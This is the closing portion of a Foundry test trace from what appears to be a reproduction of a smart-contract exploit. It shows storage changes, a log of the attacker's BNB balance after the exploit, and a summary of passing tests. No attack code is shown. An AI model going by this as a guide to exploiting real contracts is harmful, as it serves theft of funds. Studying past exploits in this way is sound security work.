    │   │   @ 0x341263f220d004e7e8d2daf4614b523a5376276d8aedce0bcf33e2d783856879: 0x00000000000000000000000000000000000000000000141eef7ca491cc12c8e1 → 0x00000000000000000000000000000000000000000000141f6e20bd47969318ce
    │   │   @ 21: 0x000000000000000000000000000000000000000000000000121725e97779fc85 → 0x000000000000000000000000000000000000000000000000121767dd402f9a09
    │   │   @ 2: 0x000000000000000000000000000000000000000000013bfb28951cc355b2023b → 0x000000000000000000000000000000000000000000013bfba739357920325228
    │   │   @ 17: 0x00000000000000000000000000000000000000000000008673bf7f2dbe76e14e → 0x00000000000000000000000000000000000000000000008679e3ad73912452a8
    │   │   @ 0x6331b79fa0223994f124e222109c04b61a8775ba12e0823995bc27904fb5e60e: 0x000000000000000000000000000000000000000000001b2c63b40c8bf0db229e → 0x000000000000000000000000000000000000000000001b1be6562a3592d0ba55
    │   └─ ← [Return] true
    ├─ emit log_named_decimal_uint(key: "[End] Attacker BNB after exploit", val: 79228162532223503366385844692 [7.922e28], decimals: 18)
    ├─  storage changes:
    │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000018e885ea098742025b9
    │   @ 0x44ad89ba62b98ff34f51403ac22759b55759460c0bb5521eb4b6ee3cff49cf83: 0x00000000000000000000000000000000000000000000b87a76b7c8ac0fc81774 → 0x00000000000000000000000000000000000000000000badc95497f27a7492a01
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.94s (10.44s CPU time)

Ran 2 test suites in 13.06s (12.44s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
